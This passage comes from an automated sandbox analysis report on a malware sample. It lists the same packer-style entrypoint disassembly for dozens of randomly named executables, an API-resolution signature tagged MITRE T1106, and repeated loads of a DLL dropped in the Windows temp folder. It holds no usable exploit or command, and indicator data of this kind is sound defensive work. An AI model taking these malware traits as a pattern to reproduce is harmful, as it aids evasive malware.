0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dhtjtp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nfrbnh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"00068.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"840262.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4880662.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"28028.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"040202.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rtbxtx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0228228.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"080844.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"046220.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"86682.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4042804.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"048424.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"802262.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"848084.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0406488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vlhdl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rpnxll.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rrhrlx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dpdrtr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"224404.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"24680.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"24680.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24680.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"24680.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24680.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"00062.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"00062.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"00062.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"00062.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"njhfl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"njhfl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"njhfl.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"njhfl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"njhfl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"60064.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"60064.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"60064.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"60064.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"60064.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"2288488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"2288488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2288488.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"2288488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2288488.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"48866.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"48866.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"48866.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"48866.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xbxthhr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"xbxthhr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xbxthhr.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"xbxthhr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xbxthhr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"fhhxhtt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"fhhxhtt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fhhxhtt.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"fhhxhtt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fhhxhtt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"08446.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"08446.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08446.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"08446.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08446.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"8240402.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"8240402.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8240402.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"8240402.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8240402.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"802848.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"802848.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"802848.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"802848.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"802848.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"4404864.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"4404864.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4404864.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"4404864.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4404864.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"dbhbvhd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"dbhbvhd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dbhbvhd.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"dbhbvhd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dbhbvhd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"xfllptv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"xfllptv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xfllptv.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"xfllptv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xfllptv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"pppjrfj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"pppjrfj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pppjrfj.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"pppjrfj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pppjrfj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"pppjrfj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"tjtvdt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"tjtvdt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjtvdt.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"tjtvdt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjtvdt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"dtdld.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"dtdld.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dtdld.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"dtdld.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dtdld.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"tjjhnh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"tjjhnh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjjhnh.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"tjjhnh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjjhnh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"brpvfll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"brpvfll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"brpvfll.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"brpvfll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"brpvfll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"brpvfll.exe\" loaded module \"MSVCRT.DLL\" at base 75aa0000\n \"brpvfll.exe\" loaded module \"SHLWAPI.DLL\" at base 76df0000\n \"brpvfll.exe\" loaded module \"USER32.DLL\" at base 767a0000\n \"brpvfll.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"240248.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"240248.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"240248.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"240248.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"240248.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"20468.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"20468.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"20468.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"20468.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"20468.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"jjjhv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"jjjhv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jjjhv.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"jjjhv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjjhv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"jfnlx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n 